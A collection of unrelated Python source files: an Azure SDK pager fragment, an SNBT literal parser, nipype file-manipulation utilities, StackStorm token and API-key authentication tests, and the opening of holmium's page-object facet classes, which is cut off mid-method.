subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("TagsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames'} # type: ignore
| |
"""This module exposes utilities for parsing snbt.
Exported functions:
parse_nbt -- Helper function that parses nbt literals
tokenize -- Generator that lazily yields tokens from a string
Exported classes:
Parser -- Class that can parse nbt tags from a literal token stream
Exported exceptions:
InvalidLiteral -- Raised when parsing invalid nbt literals
"""
__all__ = ["parse_nbt", "InvalidLiteral", "tokenize", "Parser"]
import re
from collections import namedtuple
from .serializer import STRING_QUOTES, ESCAPE_SEQUENCES, ESCAPE_SUBS
from ..tag import (
Byte,
Short,
Int,
Long,
Float,
Double,
ByteArray,
String,
List,
Compound,
IntArray,
LongArray,
OutOfRange,
IncompatibleItemType,
)
# Token definition
ESCAPE_REGEX = re.compile(r"\\.")
TOKENS = {
"QUOTED_STRING": "|".join(
fr"{q}(?:{ESCAPE_REGEX.pattern}|[^\\])*?{q}" for q in STRING_QUOTES
),
"NUMBER": r"[+-]?(?:[0-9]*?\.[0-9]+|[0-9]+\.[0-9]*?|[1-9][0-9]*|0)([eE][+-]?[0-9]+)?[bslfdBSLFD]?(?![a-zA-Z0-9._+-])",
"STRING": r"[a-zA-Z0-9._+-]+",
"COMPOUND": r"\{",
"CLOSE_COMPOUND": r"\}",
"BYTE_ARRAY": r"\[B;",
"INT_ARRAY": r"\[I;",
"LONG_ARRAY": r"\[L;",
"LIST": r"\[",
"CLOSE_BRACKET": r"\]",
"COLON": r":",
"COMMA": r",",
"INVALID": r".+?",
}
# Build the regex
TOKENS_REGEX = re.compile(
"|".join(fr"\s*(?P<{key}>{value})\s*" for key, value in TOKENS.items())
)
# Associate number suffixes to tag types
NUMBER_SUFFIXES = {"b": Byte, "s": Short, "l": Long, "f": Float, "d": Double}
# Define literal aliases
LITERAL_ALIASES = {
"true": Byte(1),
"false": Byte(0),
}
# Custom errors
class InvalidLiteral(ValueError):
"""Exception raised when parsing invalid nbt literals.
The exception must be instantiated with two parameters. The first
one needs to be a tuple representing the location of the error in
the nbt string (start_index, end_index). The second argument is the
actual error message.
"""
def __str__(self):
return f"{self.args[1]} at position {self.args[0][0]}"
# User-friendly helper
def parse_nbt(literal):
"""Parse a literal nbt string and return the resulting tag."""
parser = Parser(tokenize(literal))
tag = parser.parse()
cursor = parser.token_span[1]
leftover = literal[cursor:]
if leftover.strip():
parser.token_span = cursor, cursor + len(leftover)
raise parser.error(f"Expected end of string but got {leftover!r}")
return tag
# Implement tokenization
Token = namedtuple("Token", ["type", "value", "span"])
def tokenize(string):
"""Match and yield all the tokens of the input string."""
for match in TOKENS_REGEX.finditer(string):
yield Token(match.lastgroup, match.group().strip(), match.span())
# Implement parser
class Parser:
"""Nbt literal parser.
The parser needs to be instantiated with a token stream as argument.
Using the `parse` method will return the corresponding nbt tag.
The parser will raise an InvalidLiteral exception if it encounters
an invalid nbt literal while parsing.
"""
def __init__(self, token_stream):
self.token_stream = iter(token_stream)
self.current_token = None
self.token_span = (0, 0)
self.next()
def error(self, message):
"""Create an InvalidLiteral using the current token position."""
return InvalidLiteral(self.token_span, message)
def next(self):
"""Move to the next token in the token stream."""
self.current_token = next(self.token_stream, None)
if self.current_token is None:
self.token_span = self.token_span[1], self.token_span[1]
raise self.error("Unexpected end of input")
self.token_span = self.current_token.span
return self
def parse(self):
"""Parse and return an nbt literal from the token stream."""
token_type = self.current_token.type.lower()
handler = getattr(self, f"parse_{token_type}", None)
if handler is None:
raise self.error(f"Invalid literal {self.current_token.value!r}")
return handler()
def parse_quoted_string(self):
"""Parse a quoted string from the token stream."""
return String(self.unquote_string(self.current_token.value))
def parse_number(self):
"""Parse a number from the token stream."""
value = self.current_token.value
suffix = value[-1].lower()
try:
if suffix in NUMBER_SUFFIXES:
return NUMBER_SUFFIXES[suffix](value[:-1])
return Double(value) if "." in value else Int(value)
except (OutOfRange, ValueError):
return String(value)
def parse_string(self):
"""Parse a regular unquoted string from the token stream."""
aliased_value = LITERAL_ALIASES.get(self.current_token.value.lower())
if aliased_value is not None:
return aliased_value
return String(self.current_token.value)
def collect_tokens_until(self, token_type):
"""Yield the item tokens in a comma-separated tag collection."""
self.next()
if self.current_token.type == token_type:
return
while True:
yield self.current_token
self.next()
if self.current_token.type == token_type:
return
if self.current_token.type != "COMMA":
raise self.error(f"Expected comma but got {self.current_token.value!r}")
self.next()
def parse_compound(self):
"""Parse a compound from the token stream."""
compound_tag = Compound()
for token in self.collect_tokens_until("CLOSE_COMPOUND"):
item_key = token.value
if token.type not in ("NUMBER", "STRING", "QUOTED_STRING"):
raise self.error(f"Expected compound key but got {item_key!r}")
if token.type == "QUOTED_STRING":
item_key = self.unquote_string(item_key)
if self.next().current_token.type != "COLON":
raise self.error(f"Expected colon but got {self.current_token.value!r}")
self.next()
compound_tag[item_key] = self.parse()
return compound_tag
def array_items(self, number_type, *, number_suffix=""):
"""Parse and yield array items from the token stream."""
for token in self.collect_tokens_until("CLOSE_BRACKET"):
is_number = token.type == "NUMBER"
value = token.value.lower()
if not (is_number and value.endswith(number_suffix)):
raise self.error(f"Invalid {number_type} array element {token.value!r}")
yield int(value.replace(number_suffix, ""))
def parse_byte_array(self):
"""Parse a byte array from the token stream."""
return ByteArray(list(self.array_items("byte", number_suffix="b")))
def parse_int_array(self):
"""Parse an int array from the token stream."""
return IntArray(list(self.array_items("int")))
def parse_long_array(self):
"""Parse a long array from the token stream."""
return LongArray(list(self.array_items("long", number_suffix="l")))
def parse_list(self):
"""Parse a list from the token stream."""
try:
return List(
[self.parse() for _ in self.collect_tokens_until("CLOSE_BRACKET")]
)
except IncompatibleItemType as exc:
raise self.error(
f"Item {str(exc.item)!r} is not a {exc.subtype.__name__} tag"
) from None
def parse_invalid(self):
"""Parse an invalid token from the token stream."""
raise self.error(f"Invalid token {self.current_token.value!r}")
def unquote_string(self, string):
"""Return the unquoted value of a quoted string."""
value = string[1:-1]
forbidden_sequences = {ESCAPE_SUBS[STRING_QUOTES[string[0]]]}
valid_sequences = set(ESCAPE_SEQUENCES) - forbidden_sequences
for seq in ESCAPE_REGEX.findall(value):
if seq not in valid_sequences:
raise self.error(f'Invalid escape sequence "{seq}"')
for seq, sub in ESCAPE_SEQUENCES.items():
value = value.replace(seq, sub)
return value
| |
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Miscellaneous file manipulation functions
"""
from __future__ import print_function, division, unicode_literals, absolute_import
import sys
import pickle
import subprocess
import gzip
import hashlib
import locale
from hashlib import md5
import os
import re
import shutil
import posixpath
import simplejson as json
import numpy as np
from builtins import str, bytes, open
from .. import logging, config
from .misc import is_container
from ..interfaces.traits_extension import isdefined
from future import standard_library
standard_library.install_aliases()
fmlogger = logging.getLogger('utils')
related_filetype_sets = [
('.hdr', '.img', '.mat'),
('.nii', '.mat'),
('.BRIK', '.HEAD'),
]
class FileNotFoundError(Exception):
pass
def split_filename(fname):
"""Split a filename into parts: path, base filename and extension.
Parameters
----------
fname : str
file or path name
Returns
-------
pth : str
base path from fname
fname : str
filename from fname, without extension
ext : str
file extension from fname
Examples
--------
>>> from nipype.utils.filemanip import split_filename
>>> pth, fname, ext = split_filename('/home/data/subject.nii.gz')
>>> pth # doctest: +ALLOW_UNICODE
'/home/data'
>>> fname # doctest: +ALLOW_UNICODE
'subject'
>>> ext # doctest: +ALLOW_UNICODE
'.nii.gz'
"""
special_extensions = [".nii.gz", ".tar.gz"]
pth = os.path.dirname(fname)
fname = os.path.basename(fname)
ext = None
for special_ext in special_extensions:
ext_len = len(special_ext)
if (len(fname) > ext_len) and \
(fname[-ext_len:].lower() == special_ext.lower()):
ext = fname[-ext_len:]
fname = fname[:-ext_len]
break
if not ext:
fname, ext = os.path.splitext(fname)
return pth, fname, ext
def to_str(value):
"""
Manipulates ordered dicts before they are hashed (Py2/3 compat.)
"""
if sys.version_info[0] > 2:
retval = str(value)
else:
retval = to_str_py27(value)
return retval
def to_str_py27(value):
"""
Encode dictionary for python 2
"""
if isinstance(value, dict):
entry = '{}: {}'.format
retval = '{'
for key, val in list(value.items()):
if len(retval) > 1:
retval += ', '
kenc = repr(key)
if kenc.startswith(("u'", 'u"')):
kenc = kenc[1:]
venc = to_str_py27(val)
if venc.startswith(("u'", 'u"')):
venc = venc[1:]
retval+= entry(kenc, venc)
retval += '}'
return retval
istuple = isinstance(value, tuple)
if isinstance(value, (tuple, list)):
retval = '(' if istuple else '['
nels = len(value)
for i, v in enumerate(value):
venc = to_str_py27(v)
if venc.startswith(("u'", 'u"')):
venc = venc[1:]
retval += venc
if i < nels - 1:
retval += ', '
if istuple and nels == 1:
retval += ','
retval += ')' if istuple else ']'
return retval
retval = repr(value).decode()
if retval.startswith(("u'", 'u"')):
retval = retval[1:]
return retval
def fname_presuffix(fname, prefix='', suffix='', newpath=None, use_ext=True):
"""Manipulates path and name of input filename
Parameters
----------
fname : string
A filename (may or may not include path)
prefix : string
Characters to prepend to the filename
suffix : string
Characters to append to the filename
newpath : string
Path to replace the path of the input fname
use_ext : boolean
If True (default), appends the extension of the original file
to the output name.
Returns
-------
Absolute path of the modified filename
>>> from nipype.utils.filemanip import fname_presuffix
>>> fname = 'foo.nii.gz'
>>> fname_presuffix(fname,'pre','post','/tmp') # doctest: +ALLOW_UNICODE
'/tmp/prefoopost.nii.gz'
"""
pth, fname, ext = split_filename(fname)
if not use_ext:
ext = ''
if newpath and isdefined(newpath):
pth = os.path.abspath(newpath)
return os.path.join(pth, prefix + fname + suffix + ext)
def fnames_presuffix(fnames, prefix='', suffix='', newpath=None, use_ext=True):
"""Calls fname_presuffix for a list of files.
"""
f2 = []
for fname in fnames:
f2.append(fname_presuffix(fname, prefix, suffix, newpath, use_ext))
return f2
def hash_rename(filename, hashvalue):
"""renames a file given original filename and hash
and sets path to output_directory
"""
path, name, ext = split_filename(filename)
newfilename = ''.join((name, '_0x', hashvalue, ext))
return os.path.join(path, newfilename)
def check_forhash(filename):
"""checks if file has a hash in its filename"""
if isinstance(filename, list):
filename = filename[0]
path, name = os.path.split(filename)
if re.search('(_0x[a-z0-9]{32})', name):
hashvalue = re.findall('(_0x[a-z0-9]{32})', name)
return True, hashvalue
else:
return False, None
def hash_infile(afile, chunk_len=8192, crypto=hashlib.md5):
""" Computes hash of a file using 'crypto' module"""
hex = None
if os.path.isfile(afile):
crypto_obj = crypto()
with open(afile, 'rb') as fp:
while True:
data = fp.read(chunk_len)
if not data:
break
crypto_obj.update(data)
hex = crypto_obj.hexdigest()
return hex
def hash_timestamp(afile):
""" Computes md5 hash of the timestamp of a file """
md5hex = None
if os.path.isfile(afile):
md5obj = md5()
stat = os.stat(afile)
md5obj.update(str(stat.st_size).encode())
md5obj.update(str(stat.st_mtime).encode())
md5hex = md5obj.hexdigest()
return md5hex
def _generate_cifs_table():
"""Construct a reverse-length-ordered list of mount points that
fall under a CIFS mount.
This precomputation allows efficient checking for whether a given path
would be on a CIFS filesystem.
On systems without a ``mount`` command, or with no CIFS mounts, returns an
empty list.
"""
exit_code, output = subprocess.getstatusoutput("mount")
# Not POSIX
if exit_code != 0:
return []
# (path, fstype) tuples, sorted by path length (longest first)
mount_info = sorted((line.split()[2:5:2] for line in output.splitlines()),
key=lambda x: len(x[0]),
reverse=True)
cifs_paths = [path for path, fstype in mount_info if fstype == 'cifs']
return [mount for mount in mount_info
if any(mount[0].startswith(path) for path in cifs_paths)]
_cifs_table = _generate_cifs_table()
def on_cifs(fname):
""" Checks whether a file path is on a CIFS filesystem mounted in a POSIX
host (i.e., has the ``mount`` command).
On Windows, Docker mounts host directories into containers through CIFS
shares, which has support for Minshall+French symlinks, or text files that
the CIFS driver exposes to the OS as symlinks.
We have found that under concurrent access to the filesystem, this feature
can result in failures to create or read recently-created symlinks,
leading to inconsistent behavior and ``FileNotFoundError``s.
This check is written to support disabling symlinks on CIFS shares.
"""
# Only the first match (most recent parent) counts
for fspath, fstype in _cifs_table:
if fname.startswith(fspath):
return fstype == 'cifs'
return False
def copyfile(originalfile, newfile, copy=False, create_new=False,
hashmethod=None, use_hardlink=False,
copy_related_files=True):
"""Copy or link ``originalfile`` to ``newfile``.
If ``use_hardlink`` is True, and the file can be hard-linked, then a
link is created, instead of copying the file.
If a hard link is not created and ``copy`` is False, then a symbolic
link is created.
Parameters
----------
originalfile : str
full path to original file
newfile : str
full path to new file
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for POSIX systems
use_hardlink : Bool
specifies whether to hard-link files, when able
(Default=False), taking precedence over copy
copy_related_files : Bool
specifies whether to also operate on related files, as defined in
``related_filetype_sets``
Returns
-------
None
"""
newhash = None
orighash = None
fmlogger.debug(newfile)
if create_new:
while os.path.exists(newfile):
base, fname, ext = split_filename(newfile)
s = re.search('_c[0-9]{4,4}$', fname)
i = 0
if s:
i = int(s.group()[2:]) + 1
fname = fname[:-6] + "_c%04d" % i
else:
fname += "_c%04d" % i
newfile = base + os.sep + fname + ext
if hashmethod is None:
hashmethod = config.get('execution', 'hash_method').lower()
# Don't try creating symlinks on CIFS
if copy is False and on_cifs(newfile):
copy = True
# Existing file
# -------------
# Options:
# symlink
# to regular file originalfile (keep if symlinking)
# to same dest as symlink originalfile (keep if symlinking)
# to other file (unlink)
# regular file
# hard link to originalfile (keep)
# copy of file (same hash) (keep)
# different file (diff hash) (unlink)
keep = False
if os.path.lexists(newfile):
if os.path.islink(newfile):
if all((os.readlink(newfile) == os.path.realpath(originalfile),
not use_hardlink, not copy)):
keep = True
elif posixpath.samefile(newfile, originalfile):
keep = True
else:
if hashmethod == 'timestamp':
hashfn = hash_timestamp
elif hashmethod == 'content':
hashfn = hash_infile
newhash = hashfn(newfile)
fmlogger.debug("File: %s already exists,%s, copy:%d" %
(newfile, newhash, copy))
orighash = hashfn(originalfile)
keep = newhash == orighash
if keep:
fmlogger.debug("File: %s already exists, not overwriting, copy:%d"
% (newfile, copy))
else:
os.unlink(newfile)
# New file
# --------
# use_hardlink & can_hardlink => hardlink
# ~hardlink & ~copy & can_symlink => symlink
# ~hardlink & ~symlink => copy
if not keep and use_hardlink:
try:
fmlogger.debug("Linking File: %s->%s" % (newfile, originalfile))
# Use realpath to avoid hardlinking symlinks
os.link(os.path.realpath(originalfile), newfile)
except OSError:
use_hardlink = False # Disable hardlink for associated files
else:
keep = True
if not keep and not copy and os.name == 'posix':
try:
fmlogger.debug("Symlinking File: %s->%s" % (newfile, originalfile))
os.symlink(originalfile, newfile)
except OSError:
copy = True # Disable symlink for associated files
else:
keep = True
if not keep:
try:
fmlogger.debug("Copying File: %s->%s" % (newfile, originalfile))
shutil.copyfile(originalfile, newfile)
except shutil.Error as e:
fmlogger.warn(e.message)
# Associated files
if copy_related_files:
related_file_pairs = (get_related_files(f, include_this_file=False)
for f in (originalfile, newfile))
for alt_ofile, alt_nfile in zip(*related_file_pairs):
if os.path.exists(alt_ofile):
copyfile(alt_ofile, alt_nfile, copy, hashmethod=hashmethod,
use_hardlink=use_hardlink, copy_related_files=False)
return newfile
def get_related_files(filename, include_this_file=True):
"""Returns a list of related files, as defined in
``related_filetype_sets``, for a filename. (e.g., Nifti-Pair, Analyze (SPM)
and AFNI files).
Parameters
----------
filename : str
File name to find related filetypes of.
include_this_file : bool
If true, output includes the input filename.
"""
related_files = []
path, name, this_type = split_filename(filename)
for type_set in related_filetype_sets:
if this_type in type_set:
for related_type in type_set:
if include_this_file or related_type != this_type:
related_files.append(os.path.join(path, name + related_type))
if not len(related_files):
related_files = [filename]
return related_files
def copyfiles(filelist, dest, copy=False, create_new=False):
"""Copy or symlink files in ``filelist`` to ``dest`` directory.
Parameters
----------
filelist : list
List of files to copy.
dest : path/files
full path to destination. If it is a list of length greater
than 1, then it assumes that these are the names of the new
files.
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for posix systems
Returns
-------
None
"""
outfiles = filename_to_list(dest)
newfiles = []
for i, f in enumerate(filename_to_list(filelist)):
if isinstance(f, list):
newfiles.insert(i, copyfiles(f, dest, copy=copy,
create_new=create_new))
else:
if len(outfiles) > 1:
destfile = outfiles[i]
else:
destfile = fname_presuffix(f, newpath=outfiles[0])
destfile = copyfile(f, destfile, copy, create_new=create_new)
newfiles.insert(i, destfile)
return newfiles
def filename_to_list(filename):
"""Returns a list given either a string or a list
"""
if isinstance(filename, (str, bytes)):
return [filename]
elif isinstance(filename, list):
return filename
elif is_container(filename):
return [x for x in filename]
else:
return None
def list_to_filename(filelist):
"""Returns a list if filelist is a list of length greater than 1,
otherwise returns the first element
"""
if len(filelist) > 1:
return filelist
else:
return filelist[0]
def check_depends(targets, dependencies):
"""Return true if all targets exist and are newer than all dependencies.
An OSError will be raised if there are missing dependencies.
"""
tgts = filename_to_list(targets)
deps = filename_to_list(dependencies)
return all(map(os.path.exists, tgts)) and \
min(map(os.path.getmtime, tgts)) > \
max(list(map(os.path.getmtime, deps)) + [0])
def save_json(filename, data):
"""Save data to a json file
Parameters
----------
filename : str
Filename to save data in.
data : dict
Dictionary to save in json file.
"""
mode = 'w'
if sys.version_info[0] < 3:
mode = 'wb'
with open(filename, mode) as fp:
json.dump(data, fp, sort_keys=True, indent=4)
def load_json(filename):
"""Load data from a json file
Parameters
----------
filename : str
Filename to load data from.
Returns
-------
data : dict
"""
with open(filename, 'r') as fp:
data = json.load(fp)
return data
def loadcrash(infile, *args):
if '.pkl' in infile:
return loadpkl(infile)
elif '.npz' in infile:
DeprecationWarning(('npz files will be deprecated in the next '
'release. you can use numpy to open them.'))
data = np.load(infile)
out = {}
for k in data.files:
out[k] = [f for f in data[k].flat]
if len(out[k]) == 1:
out[k] = out[k].pop()
return out
else:
raise ValueError('Only pickled crashfiles are supported')
def loadpkl(infile):
"""Load a zipped or plain cPickled file
"""
fmlogger.debug('Loading pkl: %s', infile)
if infile.endswith('pklz'):
pkl_file = gzip.open(infile, 'rb')
else:
pkl_file = open(infile, 'rb')
try:
unpkl = pickle.load(pkl_file)
except UnicodeDecodeError:
unpkl = pickle.load(pkl_file, fix_imports=True, encoding='utf-8')
return unpkl
def crash2txt(filename, record):
""" Write out plain text crash file """
with open(filename, 'w') as fp:
if 'node' in record:
node = record['node']
fp.write('Node: {}\n'.format(node.fullname))
fp.write('Working directory: {}\n'.format(node.output_dir()))
fp.write('\n')
fp.write('Node inputs:\n{}\n'.format(node.inputs))
fp.write(''.join(record['traceback']))
def read_stream(stream, logger=None, encoding=None):
"""
Robustly reads a stream, sending a warning to a logger
if some decoding error was raised.
>>> read_stream(bytearray([65, 0xc7, 65, 10, 66])) # doctest: +ELLIPSIS +ALLOW_UNICODE
['A...A', 'B']
"""
default_encoding = encoding or locale.getdefaultlocale()[1] or 'UTF-8'
logger = logger or fmlogger
try:
out = stream.decode(default_encoding)
except UnicodeDecodeError as err:
out = stream.decode(default_encoding, errors='replace')
logger.warning('Error decoding string: %s', err)
return out.splitlines()
def savepkl(filename, record):
if filename.endswith('pklz'):
pkl_file = gzip.open(filename, 'wb')
else:
pkl_file = open(filename, 'wb')
pickle.dump(record, pkl_file)
pkl_file.close()
rst_levels = ['=', '-', '~', '+']
def write_rst_header(header, level=0):
return '\n'.join((header, ''.join([rst_levels[level]
for _ in header]))) + '\n\n'
def write_rst_list(items, prefix=''):
out = []
for item in items:
out.append('{} {}'.format(prefix, str(item)))
return '\n'.join(out) + '\n\n'
def write_rst_dict(info, prefix=''):
out = []
for key, value in sorted(info.items()):
out.append('{}* {} : {}'.format(prefix, key, str(value)))
return '\n'.join(out) + '\n\n'
def dist_is_editable(dist):
"""Is distribution an editable install?
Parameters
----------
dist : string
Package name
# Borrowed from `pip`'s' API
"""
for path_item in sys.path:
egg_link = os.path.join(path_item, dist + '.egg-link')
if os.path.isfile(egg_link):
return True
return False
| |
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import datetime
import bson
import mock
from st2tests.api import FunctionalTest
from st2common.util import date as date_utils
from st2common.models.db.auth import ApiKeyDB, TokenDB, UserDB
from st2common.persistence.auth import ApiKey, Token, User
from st2common.exceptions.auth import TokenNotFoundError
from st2tests.fixturesloader import FixturesLoader
OBJ_ID = bson.ObjectId()
USER = "stanley"
USER_DB = UserDB(name=USER)
TOKEN = uuid.uuid4().hex
NOW = date_utils.get_datetime_utc_now()
FUTURE = NOW + datetime.timedelta(seconds=300)
PAST = NOW + datetime.timedelta(seconds=-300)
class TestTokenBasedAuth(FunctionalTest):
enable_auth = True
@mock.patch.object(
Token,
"get",
mock.Mock(
return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
),
)
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
def test_token_validation_token_in_headers(self):
response = self.app.get(
"/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=False
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
@mock.patch.object(
Token,
"get",
mock.Mock(
return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
),
)
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
def test_token_validation_token_in_query_params(self):
response = self.app.get(
"/v1/actions?x-auth-token=%s" % (TOKEN), expect_errors=False
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
@mock.patch.object(
Token,
"get",
mock.Mock(
return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
),
)
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
def test_token_validation_token_in_cookies(self):
response = self.app.get(
"/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=False
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
with mock.patch.object(self.app.cookiejar, "clear", return_value=None):
response = self.app.get("/v1/actions", expect_errors=False)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
@mock.patch.object(
Token,
"get",
mock.Mock(return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=PAST)),
)
def test_token_expired(self):
response = self.app.get(
"/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=True
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 401)
@mock.patch.object(Token, "get", mock.MagicMock(side_effect=TokenNotFoundError()))
def test_token_not_found(self):
response = self.app.get(
"/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=True
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 401)
def test_token_not_provided(self):
response = self.app.get("/v1/actions", expect_errors=True)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 401)
FIXTURES_PACK = "generic"
TEST_MODELS = {"apikeys": ["apikey1.yaml", "apikey_disabled.yaml"]}
# Hardcoded keys matching the fixtures. Lazy way to workaround one-way hash and still use fixtures.
KEY1_KEY = "1234"
DISABLED_KEY = "0000"
class TestApiKeyBasedAuth(FunctionalTest):
enable_auth = True
apikey1 = None
apikey_disabled = None
@classmethod
def setUpClass(cls):
super(TestApiKeyBasedAuth, cls).setUpClass()
models = FixturesLoader().save_fixtures_to_db(
fixtures_pack=FIXTURES_PACK, fixtures_dict=TEST_MODELS
)
cls.apikey1 = models["apikeys"]["apikey1.yaml"]
cls.apikey_disabled = models["apikeys"]["apikey_disabled.yaml"]
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=UserDB(name="bill")))
def test_apikey_validation_apikey_in_headers(self):
response = self.app.get(
"/v1/actions", headers={"St2-Api-key": KEY1_KEY}, expect_errors=False
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=UserDB(name="bill")))
def test_apikey_validation_apikey_in_query_params(self):
response = self.app.get(
"/v1/actions?st2-api-key=%s" % (KEY1_KEY), expect_errors=False
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=UserDB(name="bill")))
def test_apikey_validation_apikey_in_cookies(self):
response = self.app.get(
"/v1/actions", headers={"St2-Api-key": KEY1_KEY}, expect_errors=False
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
with mock.patch.object(self.app.cookiejar, "clear", return_value=None):
response = self.app.get("/v1/actions", expect_errors=True)
self.assertEqual(response.status_int, 401)
self.assertEqual(
response.json_body["faultstring"],
"Unauthorized - One of Token or API key required.",
)
def test_apikey_disabled(self):
response = self.app.get(
"/v1/actions", headers={"St2-Api-key": DISABLED_KEY}, expect_errors=True
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 401)
self.assertEqual(
response.json_body["faultstring"], "Unauthorized - API key is disabled."
)
def test_apikey_not_found(self):
response = self.app.get(
"/v1/actions", headers={"St2-Api-key": "UNKNOWN"}, expect_errors=True
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 401)
self.assertRegexpMatches(
response.json_body["faultstring"],
"^Unauthorized - ApiKey with key_hash=([a-zA-Z0-9]+) not found.$",
)
@mock.patch.object(
Token,
"get",
mock.Mock(
return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
),
)
@mock.patch.object(
ApiKey,
"get",
mock.Mock(return_value=ApiKeyDB(user=USER, key_hash=KEY1_KEY, enabled=True)),
)
@mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
def test_multiple_auth_sources(self):
response = self.app.get(
"/v1/actions",
headers={"X-Auth-Token": TOKEN, "St2-Api-key": KEY1_KEY},
expect_errors=True,
)
self.assertIn("application/json", response.headers["content-type"])
self.assertEqual(response.status_int, 200)
| |
"""
implementation of facet bases and builtin facets
"""
import inspect
import weakref
from abc import ABCMeta, abstractmethod
import re
# pylint: disable=no-name-in-module,abstract-class-not-used
from nose.tools import assert_equals, assert_true
from six import add_metaclass
from .logger import log
@add_metaclass(ABCMeta)
class Facet(object):
"""
base class to implement an attribute of a page
"""
__ARGS__ = []
__OPTIONS__ = {}
__ALLOW_MULTIPLE__ = True
def __init__(self, required=True, debug=False, **kwargs):
self.arguments = {}
self.options = {}
self.required = required
self.debug = debug
self._parent_class = None
for arg in self.__ARGS__:
if arg not in kwargs.keys():
raise AttributeError("%s is a required argument for %s" % (
arg, self.__class__.__name__))
else:
self.arguments[arg] = kwargs[arg]
kwargs.pop(arg)
for arg in self.__OPTIONS__:
if arg in kwargs.keys():
self.options[arg] = kwargs[arg]
kwargs.pop(arg)
else:
self.options[arg] = self.__OPTIONS__[arg]
if kwargs:
raise AttributeError("unknown argument(s) to %s (%s)" % (
self.__class__.__name__, ",".join(kwargs.keys())))
def register(self, obj):
"""
registers a :class:`Facet` on an object
:param holmium.core.facets.Faceted obj: the object to register the
facet on.
"""
if inspect.isclass(obj):
obj.get_class_facets().append(self)
self.parent_class = obj
else:
obj.get_instance_facets().append(self)
self.parent_class = obj.__class__
def __call__(self, obj):
self.register(obj)
return obj
def get_name(self):
"""
returns the class name of the facet
"""
return self.__class__.__name__
@property
def parent_class(self):
"""
returns the parent class
"""
return self._parent_class()
@parent_class.setter
def parent_class(self, parent):
"""
sets the parent class
"""
self._parent_class = weakref.ref(parent)
def get_parent_name(self):
"""
returns the class name of the parent
"""
return (self.parent_class and self.parent_class.__name__) or None
@abstractmethod
def evaluate(self, driver):
"""
evaluate whether this facet holds true. Raise an Exception
if not.
:param selenium.webdriver.remote.webdriver.WebDriver driver: the
webdriver
"""
class FacetError(Exception):
"""
exception raised when a facet has an error
or can't complete
:param holmium.core.facets.Facet facet: the facet that failed to evaluate
:param exceptions.Exception exc: the inner exception that caused the
failure
"""
def __init__(self, facet, exc=None):
self.message = "%s failed to exhibit facet %s" % (
facet.get_parent_name(), facet.get_name())
if exc:
self.message += " with error %s" % exc
super(FacetError, self).__init__(self.message)
class FacetCollection(list):
"""
utility collection class for pageobjects to encapsulate
facets
"""
def __init__(self, *a):
super(FacetCollection, self).__init__(*a)
@property
def type_map(self):
"""
view on the list to help with figuring out
if a facet of the same type already exists
"""
type_mmap = {}
for item in self:
type_mmap.setdefault(type(item), []).append(item)
return type_mmap
def append(self, item):
"""
overridden add method to pop the last
item if its type does not support multiple
facets on the same object.
"""
if (
type(item) in self.type_map
and not type(item).__ALLOW_MULTIPLE__
):
self.remove(self.type_map[type(item)].pop())
if item not in self:
super(FacetCollection, self).append(item)
def evaluate_all(self, driver):
"""
